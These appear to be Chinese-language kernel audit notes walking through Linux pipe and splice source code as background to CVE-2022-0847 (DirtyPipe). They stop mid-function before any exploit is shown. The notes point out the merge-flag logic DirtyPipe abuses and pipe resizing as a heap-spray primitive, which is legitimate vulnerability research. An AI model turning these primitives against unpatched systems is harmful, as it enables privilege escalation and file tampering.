内核审计笔记 pipe.c, splice.c && CVE-2022-0847 DirtyPipe分析

只是阅读源码时的笔记..顺道复现了拖了很久的DirtyPipe.

源码分析

1
2
3
4
5
6
7
8
9
10
11
const struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};

pipe的创建(pipe,pipe2)

pipe和pipe2的系统调用都转到do_pipe2处理.调用__do_pipe_flags完成pipe的创建,然后将文件描述符拷贝到用户,如果成功则调用fd_install使文件描述符生效.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

///home/znl/SkyAsk/Binarysafe/Kernel/linux-5.11.1/fs/pipe.c

/*
* sys_pipe() is the normal C calling standard for creating
* a pipe. It's not the way Unix traditionally does this, though.
*/
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;

error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}

SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}

SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}

fd_install 将当前任务的文件描述符表中fd的对应表项与该文件关联.
先从该任务的task_struct中获取打开文件表,再从打开文件表中获取到文件描述符表.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/*
* Install a file pointer in the fd array.
*
* The VFS is full of places where we drop the files lock between
* setting the open_fds bitmap and installing the file in the file
* array. At any such point, we are vulnerable to a dup2() race
* installing a file in the array before us. We need to detect this and
* fput() the struct file we are about to overwrite in this case.
*
* It should never happen - if we allow dup2() do it, _really_ bad things
* will follow.
*
* This consumes the "file" refcount, so callers should treat it
* as if they had called fput(file).
*/

void fd_install(unsigned int fd, struct file *file)
{
struct files_struct *files = current->files;
struct fdtable *fdt;

rcu_read_lock_sched();

if (unlikely(files->resize_in_progress)) {
rcu_read_unlock_sched();
spin_lock(&files->file_lock);
fdt = files_fdtable(files);
BUG_ON(fdt->fd[fd] != NULL);
rcu_assign_pointer(fdt->fd[fd], file);
spin_unlock(&files->file_lock);
return;
}
/* coupled with smp_wmb() in expand_fdtable() */
smp_rmb();
fdt = rcu_dereference_sched(files->fdt);
BUG_ON(fdt->fd[fd] != NULL);
rcu_assign_pointer(fdt->fd[fd], file);
rcu_read_unlock_sched();
}

EXPORT_SYMBOL(fd_install);

__do_pipe_flags函数:

  • 检查flags合法性
  • create_pipe_files创建pipe文件
  • 获取两个未用的文件描述符.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    static int __do_pipe_flags(int *fd, struct file **files, int flags)
    {
    int error;
    int fdw, fdr;

    if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
    return -EINVAL;

    error = create_pipe_files(files, flags);
    if (error)
    return error;

    error = get_unused_fd_flags(flags);
    if (error < 0)
    goto err_read_pipe;
    fdr = error;

    error = get_unused_fd_flags(flags);
    if (error < 0)
    goto err_fdr;
    fdw = error;

    audit_fd_pair(fdr, fdw);
    fd[0] = fdr;
    fd[1] = fdw;
    return 0;

    err_fdr:
    put_unused_fd(fdr);
    err_read_pipe:
    fput(files[0]);
    fput(files[1]);
    return error;
    }

create_pipe_files函数

  • get_pipe_inode分配inode及pipe本体(pipe_inode_info结构),完成初始化并将二者关联.
  • alloc_file_pseudo分配一个虚拟文件并与管道的inode关联.
  • 克隆该虚拟文件作为管道的另一端
  • stream_open将文件设置为流文件(not seekable and don’t have notion of position)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    /**
    * struct pipe_inode_info - a linux kernel pipe
    * @mutex: mutex protecting the whole thing
    * @rd_wait: reader wait point in case of empty pipe
    * @wr_wait: writer wait point in case of full pipe
    * @head: The point of buffer production
    * @tail: The point of buffer consumption
    * @note_loss: The next read() should insert a data-lost message
    * @max_usage: The maximum number of slots that may be used in the ring
    * @ring_size: total number of buffers (should be a power of 2)
    * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
    * @tmp_page: cached released page
    * @readers: number of current readers of this pipe
    * @writers: number of current writers of this pipe
    * @files: number of struct file referring this pipe (protected by ->i_lock)
    * @r_counter: reader counter
    * @w_counter: writer counter
    * @fasync_readers: reader side fasync
    * @fasync_writers: writer side fasync
    * @bufs: the circular array of pipe buffers
    * @user: the user who created this pipe
    * @watch_queue: If this pipe is a watch_queue, this is the stuff for that
    **/
    struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
    #ifdef CONFIG_WATCH_QUEUE
    bool note_loss;
    #endif
    unsigned int nr_accounted;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
    #ifdef CONFIG_WATCH_QUEUE
    struct watch_queue *watch_queue;
    #endif
    };

    int create_pipe_files(struct file **res, int flags)
    {
    struct inode *inode = get_pipe_inode();
    struct file *f;
    int error;

    if (!inode)
    return -ENFILE;

    if (flags & O_NOTIFICATION_PIPE) {
    error = watch_queue_init(inode->i_pipe);
    if (error) {
    free_pipe_info(inode->i_pipe);
    iput(inode);
    return error;
    }
    }

    f = alloc_file_pseudo(inode, pipe_mnt, "",
    O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
    &pipefifo_fops);
    if (IS_ERR(f)) {
    free_pipe_info(inode->i_pipe);
    iput(inode);
    return PTR_ERR(f);
    }

    f->private_data = inode->i_pipe;

    res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
    &pipefifo_fops);
    if (IS_ERR(res[0])) {
    put_pipe_info(inode, inode->i_pipe);
    fput(f);
    return PTR_ERR(res[0]);
    }
    res[0]->private_data = inode->i_pipe;
    res[1] = f;
    stream_open(inode, res[0]);
    stream_open(inode, res[1]);
    return 0;
    }

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
* stream_open is used by subsystems that want stream-like file descriptors.
* Such file descriptors are not seekable and don't have notion of position
* (file.f_pos is always 0 and ppos passed to .read()/.write() is always NULL).
* Contrary to file descriptors of other regular files, .read() and .write()
* can run simultaneously.
*
* stream_open never fails and is marked to return int so that it could be
* directly used as file_operations.open .
*/
int stream_open(struct inode *inode, struct file *filp)
{
filp->f_mode &= ~(FMODE_LSEEK | FMODE_PREAD | FMODE_PWRITE | FMODE_ATOMIC_POS);
filp->f_mode |= FMODE_STREAM;
return 0;
}

EXPORT_SYMBOL(stream_open);

get_pipe_inode函数:

  • new_inode_pseudo分配虚拟的inode.
  • alloc_pipe_info创建pipe本体pipe_inode_info
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    static struct inode * get_pipe_inode(void)
    {
    struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
    struct pipe_inode_info *pipe;

    if (!inode)
    goto fail_inode;

    inode->i_ino = get_next_ino();

    pipe = alloc_pipe_info();
    if (!pipe)
    goto fail_iput;

    inode->i_pipe = pipe;
    pipe->files = 2;
    pipe->readers = pipe->writers = 1;
    inode->i_fop = &pipefifo_fops;

    /*
    * Mark the inode dirty from the very beginning,
    * that way it will never be moved to the dirty
    * list because "mark_inode_dirty()" will think
    * that it already _is_ on the dirty list.
    */
    inode->i_state = I_DIRTY;
    inode->i_mode = S_IFIFO | S_IRUSR | S_IWUSR;
    inode->i_uid = current_fsuid();
    inode->i_gid = current_fsgid();
    inode->i_atime = inode->i_mtime = inode->i_ctime = current_time(inode);

    return inode;

    fail_iput:
    iput(inode);

    fail_inode:
    return NULL;
    }

alloc_pipe_info函数.

  • kzalloc分配pipe_inode_info的空间
  • kcalloc分配pipe_buffer的空间(下面具体分析).
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    struct pipe_inode_info *alloc_pipe_info(void)
    {
    struct pipe_inode_info *pipe;
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    struct user_struct *user = get_current_user();
    unsigned long user_bufs;
    unsigned int max_size = READ_ONCE(pipe_max_size);

    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    if (pipe == NULL)
    goto out_free_uid;

    if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
    pipe_bufs = max_size >> PAGE_SHIFT;

    user_bufs = account_pipe_buffers(user, 0, pipe_bufs);

    if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
    user_bufs = account_pipe_buffers(user, pipe_bufs, 1);
    pipe_bufs = 1;
    }

    if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
    goto out_revert_acct;

    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
    GFP_KERNEL_ACCOUNT);

    if (pipe->bufs) {
    init_waitqueue_head(&pipe->rd_wait);
    init_waitqueue_head(&pipe->wr_wait);
    pipe->r_counter = pipe->w_counter = 1;
    pipe->max_usage = pipe_bufs;
    pipe->ring_size = pipe_bufs;
    pipe->nr_accounted = pipe_bufs;
    pipe->user = user;
    mutex_init(&pipe->mutex);
    return pipe;
    }

    out_revert_acct:
    (void) account_pipe_buffers(user, pipe_bufs, 0);
    kfree(pipe);
    out_free_uid:
    free_uid(user);
    return NULL;
    }

pipe_buffer的分配是一次性分配PIPE_DEF_BUFFERS(16)个.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

但可以通过以下调用链重新设置pipe缓冲区的总大小并alloc and copy,即pipe_buffer的数量.堆喷手段get.

1
2
3
pipe_fcntl
->pipe_set_size
->pipe_resize_ring
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
/*
* Resize the pipe ring to a number of slots.
*/
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
struct pipe_buffer *bufs;
unsigned int head, tail, mask, n;

/*
* We can shrink the pipe, if arg is greater than the ring occupancy.
* Since we don't expect a lot of shrink+grow operations, just free and
* allocate again like we would do for growing. If the pipe currently
* contains more buffers than arg, then return busy.
*/
mask = pipe->ring_size - 1;
head = pipe->head;
tail = pipe->tail;
n = pipe_occupancy(pipe->head, pipe->tail);
if (nr_slots < n)
return -EBUSY;

bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
if (unlikely(!bufs))
return -ENOMEM;

/*
* The pipe array wraps around, so just start the new one at zero
* and adjust the indices.
*/
if (n > 0) {
unsigned int h = head & mask;
unsigned int t = tail & mask;
if (h > t) {
memcpy(bufs, pipe->bufs + t,
n * sizeof(struct pipe_buffer));
} else {
unsigned int tsize = pipe->ring_size - t;
if (h > 0)
memcpy(bufs + tsize, pipe->bufs,
h * sizeof(struct pipe_buffer));
memcpy(bufs, pipe->bufs + t,
tsize * sizeof(struct pipe_buffer));
}
}

head = n;
tail = 0;

kfree(pipe->bufs);
pipe->bufs = bufs;
pipe->ring_size = nr_slots;
if (pipe->max_usage > nr_slots)
pipe->max_usage = nr_slots;
pipe->tail = tail;
pipe->head = head;

/* This might have made more room for writers */
wake_up_interruptible(&pipe->wr_wait);
return 0;
}

pipe_write

比较长,分段分析.
用户数据是通过io向量来存的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
struct iov_iter {
/*
* Bit 0 is the read/write bit, set if we're writing.
* Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
* the caller isn't expecting to drop a page reference when done.
*/
unsigned int type;
size_t iov_offset;
size_t count;
union {
const struct iovec *iov;
const struct kvec *kvec;
const struct bio_vec *bvec;
struct pipe_inode_info *pipe;
};
union {
unsigned long nr_segs;
struct {
unsigned int head;
unsigned int start_head;
};
};
};

如果该pipe没有读者 (!pipe->readers)直接返回-EPIPE.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;

/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;

__pipe_lock(pipe);

if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif


注意这里的读者不是说read阻塞在该pipe上的任务数,而是以可读方式打开了该管道的计数,对于匿名管道来说readers和writers都为1.而对于有名管道fifo,则是通过fifo_open时的读写方式来增加计数.

1
2
3
4
5
6
7
static struct inode * get_pipe_inode(void)
{
...
pipe->readers = pipe->writers = 1;
...
}

如果当前pipe不为空(head!=tail),则尝试先将部分数据写入上次使用的buffer,注意这里需要该buffer有PIPE_BUF_FLAG_CAN_MERGE的标志.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
   /*
* If it wasn't empty we try to merge new data into
* the last buffer.
*
* That naturally merges small writes, but it also
* page-aligs the rest of the writes for large writes
* spanning multiple pages.
*/
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;

ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}

然后是正式的大循环写入
每轮循环:

  • 如果!pipe->readers则返回-EPIPE;
  • 为本次写入获取一张临时页面(pipe->tmp_pages),可能分配也可能使用上次失败留下或刚消耗完的.
  • 插入到当前buffer->page中并拷贝用户数据.
  • 如果pipe满了,直接返回(O_NONBLOCK)或唤醒rd_wait并加入wr_wait等待数据被消耗.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    for (;;) {
    if (!pipe->readers) {
    send_sig(SIGPIPE, current, 0);
    if (!ret)
    ret = -EPIPE;
    break;
    }

    head = pipe->head;
    if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
    unsigned int mask = pipe->ring_size - 1;
    struct pipe_buffer *buf = &pipe->bufs[head & mask];
    struct page *page = pipe->tmp_page;
    int copied;

    if (!page) {
    page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
    if (unlikely(!page)) {
    ret = ret ? : -ENOMEM;
    break;
    }
    pipe->tmp_page = page;
    }

    /* Allocate a slot in the ring in advance and attach an
    * empty buffer. If we fault or otherwise fail to use
    * it, either the reader will consume it or it'll still
    * be there for the next write.
    */
    spin_lock_irq(&pipe->rd_wait.lock);

    head = pipe->head;
    if (pipe_full(head, pipe->tail, pipe->max_usage)) {
    spin_unlock_irq(&pipe->rd_wait.lock);
    continue;
    }

    pipe->head = head + 1;
    spin_unlock_irq(&pipe->rd_wait.lock);

    /* Insert it into the buffer array */
    buf = &pipe->bufs[head & mask];
    buf->page = page;
    buf->ops = &anon_pipe_buf_ops;
    buf->offset = 0;
    buf->len = 0;
    if (is_packetized(filp))
    buf->flags = PIPE_BUF_FLAG_PACKET;
    else
    buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
    pipe->tmp_page = NULL;

    copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
    if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
    if (!ret)
    ret = -EFAULT;
    break;
    }
    ret += copied;
    buf->offset = 0;
    buf->len = copied;

    if (!iov_iter_count(from))
    break;
    }

    if (!pipe_full(head, pipe->tail, pipe->max_usage))
    continue;

    /* Wait for buffer space to become available. */
    if (filp->f_flags & O_NONBLOCK) {
    if (!ret)
    ret = -EAGAIN;
    break;
    }
    if (signal_pending(current)) {
    if (!ret)
    ret = -ERESTARTSYS;
    break;
    }

    /*
    * We're going to release the pipe lock and wait for more
    * space. We wake up any readers if necessary, and then
    * after waiting we need to re-check whether the pipe
    * become empty while we dropped the lock.
    */
    __pipe_unlock(pipe);
    if (was_empty) {
    wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
    kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
    }
    wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
    __pipe_lock(pipe);
    was_empty = pipe_empty(pipe->head, pipe->tail);
    wake_next_writer = true;
    }

pipe_read

还是大循环的形式.将buf->page拷贝到io向量中后,若该page没有其他引用,将其作为pipe->tmp_page或直接释放.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;
ssize_t ret;

/* Null read succeeds. */
if (unlikely(total_len == 0))
return 0;

ret = 0;
__pipe_lock(pipe);

/*
* We only wake up writers if the pipe was full when we started
* reading in order to avoid unnecessary wakeups.
*
* But when we do wake up writers, we do so using a sync wakeup
* (WF_SYNC), because we want them to get going and generate more
* data for us.
*/
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
for (;;) {
unsigned int head = pipe->head;
unsigned int tail = pipe->tail;
unsigned int mask = pipe->ring_size - 1;

#ifdef CONFIG_WATCH_QUEUE
if (pipe->note_loss) {
struct watch_notification n;

if (total_len < 8) {
if (ret == 0)
ret = -ENOBUFS;
break;
}

n.type = WATCH_TYPE_META;
n.subtype = WATCH_META_LOSS_NOTIFICATION;
n.info = watch_sizeof(n);
if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) {
if (ret == 0)
ret = -EFAULT;
break;
}
ret += sizeof(n);
total_len -= sizeof(n);
pipe->note_loss = false;
}
#endif

if (!pipe_empty(head, tail)) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
size_t chars = buf->len;
size_t written;
int error;

if (chars > total_len) {
if (buf->flags & PIPE_BUF_FLAG_WHOLE) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
chars = total_len;
}

error = pipe_buf_confirm(pipe, buf);
if (error) {
if (!ret)
ret = error;
break;
}

written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
ret += chars;
buf->offset += chars;
buf->len -= chars;

/* Was it a packet buffer? Clean up and exit */
if (buf->flags & PIPE_BUF_FLAG_PACKET) {
total_len = chars;
buf->len = 0;
}

if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
#ifdef CONFIG_WATCH_QUEUE
if (buf->flags & PIPE_BUF_FLAG_LOSS)
pipe->note_loss = true;
#endif
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}
total_len -= chars;
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}

if (!pipe->writers)
break;
if (ret)
break;
if (filp->f_flags & O_NONBLOCK) {
ret = -EAGAIN;
break;
}
__pipe_unlock(pipe);

/*
* We only get here if we didn't actually read anything.
*
* However, we could have seen (and removed) a zero-sized
* pipe buffer, and might have made space in the buffers
* that way.
*
* You can't make zero-sized pipe buffers by doing an empty
* write (not even in packet mode), but they can happen if
* the writer gets an EFAULT when trying to fill a buffer
* that already got allocated and inserted in the buffer
* array.
*
* So we still need to wake up any pending writers in the
* _very_ unlikely case that the pipe was full, but we got
* no data.
*/
if (unlikely(was_full)) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}

/*
* But because we didn't read anything, at this point we can
* just return directly with -ERESTARTSYS if we're interrupted,
* since we've done any required wakeups and there's no need
* to mark anything accessed. And we've dropped the lock.
*/
if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
return -ERESTARTSYS;

__pipe_lock(pipe);
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
wake_next_reader = true;
}

pipe_release

close掉pipe的两端即可释放.

1
2
3
pipe_release
->put_pipe_info
->free_pipe_info
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
static int
pipe_release(struct inode *inode, struct file *file)
{
struct pipe_inode_info *pipe = file->private_data;

__pipe_lock(pipe);
if (file->f_mode & FMODE_READ)
pipe->readers--;
if (file->f_mode & FMODE_WRITE)
pipe->writers--;

/* Was that the last reader or writer, but not the other side? */
if (!pipe->readers != !pipe->writers) {
wake_up_interruptible_all(&pipe->rd_wait);
wake_up_interruptible_all(&pipe->wr_wait);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}
__pipe_unlock(pipe);

put_pipe_info(inode, pipe);
return 0;
}

static void put_pipe_info(struct inode *inode, struct pipe_inode_info *pipe)
{
int kill = 0;

spin_lock(&inode->i_lock);
if (!--pipe->files) {
inode->i_pipe = NULL;
kill = 1;
}
spin_unlock(&inode->i_lock);

if (kill)
free_pipe_info(pipe);
}


void free_pipe_info(struct pipe_inode_info *pipe)
{
int i;

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
watch_queue_clear(pipe->watch_queue);
put_watch_queue(pipe->watch_queue);
}
#endif

(void) account_pipe_buffers(pipe->user, pipe->nr_accounted, 0);
free_uid(pipe->user);
for (i = 0; i < pipe->ring_size; i++) {
struct pipe_buffer *buf = pipe->bufs + i;
if (buf->ops)
pipe_buf_release(pipe, buf);
}
if (pipe->tmp_page)
__free_page(pipe->tmp_page);
kfree(pipe->bufs);
kfree(pipe);
}

splice

splice直接完成管道与文件之间的数据传输,避免内核与用户之间的数据拷贝.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
int, fd_out, loff_t __user *, off_out,
size_t, len, unsigned int, flags)
{
struct fd in, out;
long error;

if (unlikely(!len))
return 0;

if (unlikely(flags & ~SPLICE_F_ALL))
return -EINVAL;

error = -EBADF;
in = fdget(fd_in);
if (in.file) {
out = fdget(fd_out);
if (out.file) {
error = __do_splice(in.file, off_in, out.file, off_out,
len, flags);
fdput(out);
}
fdput(in);
}
return error;
}

__do_splice获取并校验用户参数,管道一端不能设置偏移.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
static long __do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset, *__off_in = NULL, *__off_out = NULL;
long ret;

ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);

if (ipipe && off_in)
return -ESPIPE;
if (opipe && off_out)
return -ESPIPE;

if (off_out) {
if (copy_from_user(&offset, off_out, sizeof(loff_t)))
return -EFAULT;
__off_out = &offset;
}
if (off_in) {
if (copy_from_user(&offset, off_in, sizeof(loff_t)))
return -EFAULT;
__off_in = &offset;
}

ret = do_splice(in, __off_in, out, __off_out, len, flags);
if (ret < 0)
return ret;

if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t)))
return -EFAULT;
if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t)))
return -EFAULT;

return ret;
}

do_splice函数根据两端文件的性质进行dispatch.

1
2
3
4
5
6
/*
* Determine where to splice to/from.
*/
long do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags);

1
2
3
4
do_splice
->splice_pipe_to_pipe pipe->pipe
->do_splice_from pipe->file
->do_splice_to file->pipe

splice_pipe_to_pipe函数
直接看主循环逻辑.分两种情况

  • 还需要拷贝的长度大于当前ibuf的长度,则直接将该ibuf给obuf,并将ibuf->op置NULL,类似于移动语义. 这里没有将ibuf->page置空,直觉上会有问题,但会看一下pipe_write,只会用pipe->page替换buf->page后再进行拷贝,所以不会影响到obuf.除非是进行Merge,假设要merge到该ibuf,则该ibuf应该是head-1,又由于i_tail++的操作,此时tail应该是(head-1)+1 ==head.则pipe此时必定是空的,也就不会进行merge操作,排除merge到该buf的可能(说的可能不是很好理解,后面还有一次分析).
  • 还需要拷贝的长度小于当前ibuf的长度,先调用pipe_buf_get将ibuf->page引用+1,该页面同时被ibuf和obuf使用.但两者的len,off,flags不同.注意这里需要清除PIPE_BUF_FLAG_CAN_MERGE标志,因为该页在ibuf中还存在可读数据,在outbuf中合并写入会覆盖掉原数据.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
    struct pipe_inode_info *opipe,
    size_t len, unsigned int flags)
    {
    ......
    do {
    ......
    ibuf = &ipipe->bufs[i_tail & i_mask];
    obuf = &opipe->bufs[o_head & o_mask];

    if (len >= ibuf->len) {
    /*
    * Simply move the whole buffer from ipipe to opipe
    */
    *obuf = *ibuf;
    ibuf->ops = NULL;
    i_tail++;
    ipipe->tail = i_tail;
    input_wakeup = true;
    o_len = obuf->len;
    o_head++;
    opipe->head = o_head;
    } else {
    /*
    * Get a reference to this pipe buffer,
    * so we can copy the contents over.
    */
    if (!pipe_buf_get(ipipe, ibuf)) {
    if (ret == 0)
    ret = -EFAULT;
    break;
    }
    *obuf = *ibuf;

    /*
    * Don't inherit the gift and merge flags, we need to
    * prevent multiple steals of this page.
    */
